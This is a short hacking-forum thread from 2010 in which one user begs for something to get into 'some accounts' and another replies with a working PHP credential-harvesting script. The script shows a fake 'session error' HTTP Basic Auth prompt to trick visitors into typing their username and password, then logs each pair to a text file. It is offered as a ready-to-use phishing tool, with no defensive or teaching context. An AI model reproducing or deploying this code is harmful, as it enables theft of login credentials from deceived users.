i need one ill give who ever get me on some accounts ... i will make it right i wont scam you please ....
Results 1 to 3 of 3
Thread: flw
- 14 Aug. 2010 09:14pm #1
flw
- 15 Aug. 2010 03:58pm #2
- Age
- 97
- Join Date
- Nov. 2009
- Location
- In the computer
- Posts
- 11,186
- Reputation
- 1029
- LCash
- 0.00
- Awards
- 17 Aug. 2010 12:00am #3
here is the code
<?php
if(isset($_SERVER['PHP_AUTH_USER'])){
$Handle = @fopen('Accounts.txt', 'a');
@fwrite($Handle, "Username = {$_SERVER['PHP_AUTH_USER']}\r\n");
@fwrite($Handle, "Password = {$_SERVER['PHP_AUTH_PW']}\r\n\r\n");
@fclose($Handle);
}
header('WWW-Authenticate: Basic realm="A session error has occured please verify your Username and Password."');
header('HTTP/1.0 401 Unauthorized');
exit;
?>